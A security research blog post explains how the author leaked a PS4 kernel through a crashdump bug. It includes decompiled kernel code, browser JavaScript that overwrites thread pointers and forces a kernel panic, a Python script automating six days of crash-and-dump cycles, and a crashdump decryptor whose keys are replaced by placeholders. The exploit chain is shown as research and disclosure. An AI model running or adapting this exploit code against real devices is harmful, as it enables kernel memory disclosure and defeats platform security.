Dumping a PS4 Kernel in "Only" 6 Days By ps4_enthusiast

Filed under ps4 vulnerability exploit

What if a secure device had an attacker-viewable crashdump format?

What if that same device allowed putting arbitrary memory into the crashdump?

Amazingly, the ps4 tempted fate by supporting both of these features!

Let’s see how that turned out…

Crashdumps on PS4

The crash handling infrastructure of the ps4 kernel is interesting for 2 main reasons:

It is ps4-specific code (likely to be buggy)

If the crashdump can be decoded, we will gain very useful info for finding bugs and creating reliable exploits

On a normal FreeBSD system, a kernel panic will create a dump by calling kern_reboot with the RB_DUMP flag. This then leads to doadump being called, which will dump a rather tiny amount of information about the kernel image itself to some storage device.

On ps4, the replacement for doadump is mdbg_run_dump , which can be called from panic or directly from trap_fatal . The amount of information stored into the dump is gigantic by comparison - kernel state for all process, thread, and vm objects are included, along with some metadata about loaded libraries. Other obvious changes from the vanilla FreeBSD method are that the mdbg_run_dump encodes data recorded into the dump on a field-by-field basis and additionally encrypts the resulting buffer before finally storing it to disk.

Dumping Anything

Let’s zoom in to a special part of mdbg_run_dump - where it iterates over all process’ threads and tries to dump some pthread state:

void mdbg_run_dump ( struct trapframe * frame ) { // ... for ( p = allproc ; p != NULL ; p = cur_proc -> p_list . le_next ) { // ... for ( td = p -> p_threads . tqh_first ; td != NULL ; td = td -> td_plist . tqe_next ) { // ... mdbg_pthread_fill_thrinfo2 ( & dumpstate , td -> td_proc , ( void * ) td -> td_pcb -> pcb_fsbase , sysdump__internal_call_readuser ); // ... } // ... } // ... } void mdbg_pthread_fill_thrinfo2 ( void * dst , struct proc * p , void * fsbase , int ( * callback )( void * dst , struct proc * p , signed __int64 va , int len )) { struct pthread * tcb_thread ; // [rsp+8h] [rbp-408h] u8 pthread [ 984 ]; // [rsp+10h] [rbp-400h] if ( ! callback ( & tcb_thread , p , ( signed __int64 ) fsbase + 0x10 , 8 ) && ! callback ( pthread , p , ( signed __int64 ) tcb_thread , 984 ) ) { * ( _QWORD * ) dst = * ( _QWORD * ) & pthread [ 0xA8 ]; * (( _QWORD * ) dst + 1 ) = * ( _QWORD * ) & pthread [ 0xB0 ]; } } int sysdump__internal_call_readuser ( void * dst , struct proc * p , signed __int64 va , int len ) { const void * src ; // rsi struct vmspace * vm ; // rcx int rv ; // rax vm_paddr_t kva ; // rax src = ( const void * ) va ; if ( va >= 0 ) { // if va is in userspace, get a kernel mapping of the address // (note "va" is treated as signed, here) vm = p -> p_vmspace ; rv = EFAULT ; if ( ! vm ) return rv ; kva = pmap_extract ( vm -> vm_pmap , va ); src = ( const void * )( kva | - ( signed __int64 )( kva < 1 ) | 0xFFFFFE0000000000LL ); } rv = EFAULT ; if ( src && src != ( const void * ) - 1LL ) { if ( va < 0 ) { src = ( const void * ) va ; } else { rv = ESRCH ; if ( ! p ) return rv ; } // so, this can still be reached even if "va" is originally in kernel space! memcpy ( dst , src , len ); rv = 0LL ; } return rv ; }

Above, dumpstate is a temporary buffer which will eventually make it into the crashdump. To summarize, sysdump__internal_call_readuser can be made to function as a read-anywhere oracle. This is because fsbase will point into our (owned) webkit process’ usermode address space. Thus, even without changing the actual fsbase value, we may freely change the value of tcb_thread , which is stored at fsbase + 0x10 .

Further, sysdump__internal_call_readuser will happily read from a kernel address and put the result into the dump.

We can now put any kernel location into the dump, but we still need to decrypt and decode it…

Aside from that, there’s also the issue that we may only add 0x10 bytes per thread in this manner…

Crashdump Crypto

The crazy news about the encryption of crashdumps isn’t just that they use symmetric encryption - they also tend to use the same keys between firmware versions! This meant that from firmware 1.01 until they somehow realized it was “probably a bad idea” to reuse symmetric keys which could be exposed if the kernel were dumped, only versioned_keys[1] was needed (see Appendix). After that point crashdumps are still useful, however you must dump the kernel once beforehand in order to obtain the keys.

Crashdump Decoding

The crashdump encoding (which we know is called “nxdp” from the symbols present in firmware 1.01) is a simple run length encoding derivative, with a few primitive data types supported. A functional parser is at the end of the post (see Appendix).

Crashdump Automation

This seems like quite a bit of effort for some 0x10 bytes per thread, doesn’t it? Wait - it gets better! During testing, I found that I could only make ~600 threads exist concurrently before the browser process would either crash, hang, or just refuse to make more threads. Some simple math:

full_dump_size = 32MB crashdump_cycle_time = ~5 minutes thread_per_crashdump_cycle = 600 per_dump_size = thread_per_crashdump_cycle * 0x10 bytes = 9600 bytes (full_dump_size / per_dump_size) * crashdump_cycle_time = 11 days

11 days… Eventually, I was able to cut the required time down to only 6 days by being a bit more intelligent in choosing which memory ranges to dump. Normally when dumping from software exploits one would just linearly dump as much as possible, which has the advantage of bringing in .bss and other areas which can be handy for static analysis.

With prerequisites for leaking the kernel out of crashdumps taken care of, I set about with automating the procedure such that I could just let it run without thinking about it and come back some days later to a shiny new kernel dump.

Since the ps4 kernel stores the crashdump to the hard drive, I needed a way to either intercept the data in-flight to the hard drive, or rig up some way to read from the hard drive between panic cycles. Conveniently, it was around this time that I heard about the work vpikhur had done on EAP. Details on the EAP hack are out of scope for this post (see his talk for more details), but suffice it to say that EAP is an embedded processor in the Aeolia southbridge, and vpikhur had figured out how to get persistent kernel-level code exec on it (:D). Using knowledge gained from this hack, I was provided with a replacement EAP kernel binary which would detect crashdumps on the hard drive and shoot them over the network to my PC.

With this capability and some small hardware modifications to connect my ps4’s power switch to the network and simulate input to the ps4 with linux’ usb gadget API, I was able to simply script the entire process (this code ran on my PC and spoke to a web server on a Novena ( remote server ) to control the ps4):

import requests , time import socket import parse_dump import struct from io import BytesIO import sys , traceback remote_server = 'novena ip' def send_cmd ( cmd ): requests . get ( 'http:// %s ' % ( remote_server ), headers = { 'remote-cmd' : cmd }) def dump_index_get (): with open ( 'dump-index' ) as f : return int ( f . read ()) return 0 def dump_index_set ( index ): print ( 'setting dump-index to %i ' % ( index )) with open ( 'dump-index' , 'w' ) as f : f . write ( ' %i ' % ( index )) def dump_index_increment (): index = dump_index_get () dump_index_set ( index + 1 ) def process_dump ( partition_data ): nxdp = parse_dump . NXDP ( BytesIO ( parse_dump . Decryptor ( partition_data ) . data )) # uses the most recent thread_info sent to the http server to transpose # the dump data into flat memory dumps nxdp . dump_thread_leak () def recv_dump (): sock = socket . socket () with socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) as sock : sock . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 ) sock . bind (( '' , 1339 )) sock . listen ( 1 ) conn , addr = sock . accept () with conn : magic = struct . unpack ( '<L' , conn . recv ( 4 ))[ 0 ] if magic != 0x13371337 : print ( 'bad magic' ) length , status = struct . unpack ( '<2L' , conn . recv ( 4 * 2 )) if status != 0 : print ( 'bad status' ) data = b '' while len ( data ) < length : data += conn . recv ( 0x8000 ) process_dump ( data ) dump_index_set ( dump_index_get ()) # turn on send_cmd ( 'power' ) while True : # boot from healthy state takes ~30 seconds time . sleep ( 35 ) # going to browser should load exploit and crash ps4 send_cmd ( 'start-browser' ) # wait for exploit to run and ps4 to power off completely time . sleep ( 20 ) # power on ps4 # it will go through fsck (~60secs) and boot to a "send error report?" screen. send_cmd ( 'power' ) # power must be pressed twice... time . sleep ( 2 ) send_cmd ( 'power' ) time . sleep ( 60 ) # fsck time . sleep ( 35 ) # power-up # go past "send error report?" screen... send_cmd ( 'ack-crash' ) # wait for xmb to load time . sleep ( 10 ) # go to rest mode to let EAP do it's thing send_cmd ( 'suspend' ) # wait for data to arrive and process it try : recv_dump () # after recving all data from EAP, need to wait for reboot (done on loop) # assuming EAP sent data OK, it will reboot by itself into healthy state dump_index_increment () except : # expect that nxdp data was recv'd, but decode fail -> just retry same # position exc_type , exc_value , exc_traceback = sys . exc_info () traceback . print_exception ( exc_type , exc_value , exc_traceback ) print ( 'nxdp decode failed, retry' )

Triggering the Vulnerability

In order to progressively dump the regions I wanted, I created a simple json schema to record metadata which could be used to tie TIDs to the kernel address which their portion of the crashdump would contain, as well as maintain the base address used per-run ( getDumpIndex() , here). Below is the snippet of js executed in the ps4 browser process in order to initiate a crashdump:

... // spawn threads which will just spin, and modify tcb->tcb_thread // inf loop around nanosleep(30 secs) var thread_map = []; for ( var thrcnt = 0 ; thrcnt < 600 ; thrcnt ++ ) { var local_buf = scratchPtr . plus ( 0x2000 ); var rv = doCall ( gadgets . pthread_create , local_buf , 0 , syms . libkernel . inf_loop_with_nanosleep , 0 ); var thread = read64 ( local_buf ); var tcb = read64 ( thread . plus ( 0x1e0 )); var tid = read32 ( thread ); thread_map . push ({ tcb_thread_ptr : tcb . plus ( 0x10 ), thr_idx : thrcnt , tid : tid }); } // this was for back when there was no kernel .text aslr :) var dump_base = new U64 ( 0x80000000 , 0xffffffff ); dump_base = dump_base . plus ( 600 * 0x10 * getDumpIndex ()); // sync layout so dumped memory can be ordered correctly sendThreadInfo ( dump_base , thread_map ); // wait for threads to start - delayed start could overwrite tcb_thread doCall ( gadgets . sleep , 3 ); // now set tcb_thread dump_base = dump_base . minus ( 0xa8 ); for ( var i = 0 ; i < thread_map . length ; i ++ ) { // 0x10 bytes at each tcb_thread + 0xa8 will be added to dump var t = thread_map [ i ]; var dumpaddr = dump_base . plus ( t . thr_idx * 0x10 ); write64 ( t . tcb_thread_ptr , dumpaddr ); } // panic (here, using namedobj bug to free invalid pointer) kernel_free ( toU64 ( 0xdeadbeef )); return ; }

After a panic and crashdump would occur, the ps4 would reboot and go through its standard fsck procedure. My control script would then cause the ps4 to enter suspend mode, at which point the custom EAP kernel would take over and upload the crashdump to my PC. Once on the PC, the crashdump would be decrypted and parsed in order to extract the leaked 9600 bytes. Then, the process would start all over…for 6 days :)

The Fix (Kind of…)

On firmware ~4.50, the crashdump key generation method was finally changed to require knowledge of an asymmetric key in order to decrypt the dump contents.

// one of the first calls mdbg_run_dump makes int sysdump_output_establish_secure_context_on_dump () { int rv ; // eax u8 nonces_to_sign [ 32 ]; // [rsp+8h] [rbp-48h] // fill globals sysdump_rng_nonce3_128 ( nonce3 ); sysdump_rng_nonce4_128 ( nonce4 ); memcpy ( nonces_to_sign , nonce3 , 16LL ); memcpy ( & nonces_to_sign [ 16 ], nonce4 , 16LL ); rv = RsaesOaepEnc2048_Sha256 ( sysdump_rsa_n , sysdump_rsa_e , nonces_to_sign , 32 , sysdump_rsa_enc_nonces ); if ( rv ) bzero ( sysdump_rsa_enc_nonces , 0x100uLL ); Sha256HmacInit ( sysdump_hmac_ctx , nonce4 , 0x10u ); bzero ( dump_aes_ctx_iv , 0x10uLL ); return rv ; }

The above version of sysdump_output_establish_secure_context_on_dump is from firmware 4.55. nonce3 is the value which will be used as the crashdump AES key. This value is only stored in the dump within an RSA encrypted blob. As such, a new approach would be needed to attempt key recovery.

Fin

This was probably the most convoluted and lengthy setup I’ve done for a bug which amounts to just an infoleak. But it was a fun experience.

Keep Hacking!

Appendix

Crashdump Decryptor

''' This decrypts a coredump stored on the "custom" swap partition. The GPT UUID is B4 A5 A9 76 B0 44 2A 47 BD E3 31 07 47 2A DE E2 Look for "Decryptor.header_t" (see below)... ''' from Crypto.Cipher import AES from Crypto.Hash import HMAC , SHA256 import binascii , struct from construct import * def aes_ecb_encrypt ( k , d ): return AES . new ( k , AES . MODE_ECB ) . encrypt ( d ) def aes_ecb_decrypt ( k , d ): return AES . new ( k , AES . MODE_ECB ) . decrypt ( d ) def hmac_sha256 ( k , d ): return HMAC . new ( k , msg = d , digestmod = SHA256 ) . digest () def ZeroPadding ( size ): return Padding ( size , strict = True ) class RootKeys : def __init__ ( s , kd , kc ): s . kd = binascii . unhexlify ( kd ) s . kc = binascii . unhexlify ( kc ) class Keyset : def __init__ ( s , hmac_key , aes_key ): s . hmac_key , s . aes_key = hmac_key , aes_key s . iv = b ' \0 ' * len ( s . aes_key ) class Decryptor : DUMP_BLOCK_LEN = 0x4000 versioned_keys = { 1 : [ RootKeys ( 'you' , 'should' )], 2 : [ RootKeys ( 'probably' , 'find' )], 3 : [ RootKeys ( 'these' , 'your-' ), # 4.05 RootKeys ( 'self' , ':)' ), # 4.07 ] } secure_header_t = Struct ( 'secure_header' , # only seen version 1 so far ULInt32 ( 'version' ), # Aes128Ecb(kd, openpsid) Bytes ( 'openpsid_enc' , 0x10 ), # 0x80 bytes of secure_header are hashed for the data_hmac, # but only 0x14 bytes (actual used bytes) are actually written to disk... ZeroPadding ( 0x80 - 0x14 ), ) final_header_t = Struct ( 'final_header' , Bytes ( 'unknown' , 0x10 ), # 1 : unread dump present, 2 : no new dump data ULInt64 ( 'state' ), ULInt64 ( 'data_len' ), ZeroPadding ( 0x10 ), Bytes ( 'data_hmac' , 0x20 ) ) header_t = Struct ( 'header' , secure_header_t , ZeroPadding ( 0x100 - secure_header_t . sizeof ()), final_header_t ) def keygen ( s , openpsid , root_keys ): openpsid_enc = aes_ecb_encrypt ( root_keys . kd , openpsid ) digest = hmac_sha256 ( root_keys . kc , openpsid_enc ) return Keyset ( digest [: 0x10 ], digest [ 0x10 :]) def hmac_verify ( s , keyset ): hmac = HMAC . new ( keyset . hmac_key , digestmod = SHA256 ) with open ( s . fpath , 'rb' ) as f : hmac . update ( f . read ( s . secure_header_t . sizeof ())) data_len = s . header . final_header . data_len data_len -= s . DUMP_BLOCK_LEN f . seek ( s . DUMP_BLOCK_LEN ) hmac . update ( f . read ( data_len )) return hmac . digest () == s . header . final_header . data_hmac return False def unwrap_keyset ( s ): openpsid_enc = s . header . secure_header . openpsid_enc version = s . header . secure_header . version for root_keys in s . versioned_keys [ version ]: openpsid = aes_ecb_decrypt ( root_keys . kd , openpsid_enc ) digest = hmac_sha256 ( root_keys . kc , openpsid_enc ) keyset = Keyset ( digest [: 0x10 ], digest [ 0x10 :]) if s . hmac_verify ( keyset ): print ( 'OpenPSID:

%s ' % ( binascii . hexlify ( openpsid ))) return keyset return None def __init__ ( s , fpath , default_openpsid = None , default_keyset_id = None ): s . fpath = fpath with open ( s . fpath , 'rb' ) as f : s . header = s . header_t . parse_stream ( f ) if s . header . final_header . state == 1 : s . keyset = s . unwrap_keyset () else : # something happened to the dump (like it was "consumed" after a reboot). # in that case most of the header will be zerod assert default_openpsid is not None , 'must provide openpsid to decrypt dump without secure_header' assert default_keyset_id is not None , 'must provide keyset id to decrypt dump without secure_header' root_keys = s . versioned_keys [ default_keyset_id [ 0 ]][ default_keyset_id [ 1 ]] s . keyset = s . keygen ( default_openpsid , root_keys ) assert s . keyset is not None # just decrypt it all at once for now # if we reach here, hmac is already verified or it didn't exist with open ( s . fpath , 'rb' ) as f : f . seek ( s . DUMP_BLOCK_LEN ) data_enc = f . read () # This should actually be AesCbcCfb128Encrypt, # but it's always block-size multiple in crashdump usage. s . data = AES . new ( s . keyset . aes_key , AES . MODE_CBC , s . keyset . iv ) . decrypt ( data_enc ) ''' with open('debug.bin', 'wb') as fo: fo.write(s.data) #'''

NXDP Decoder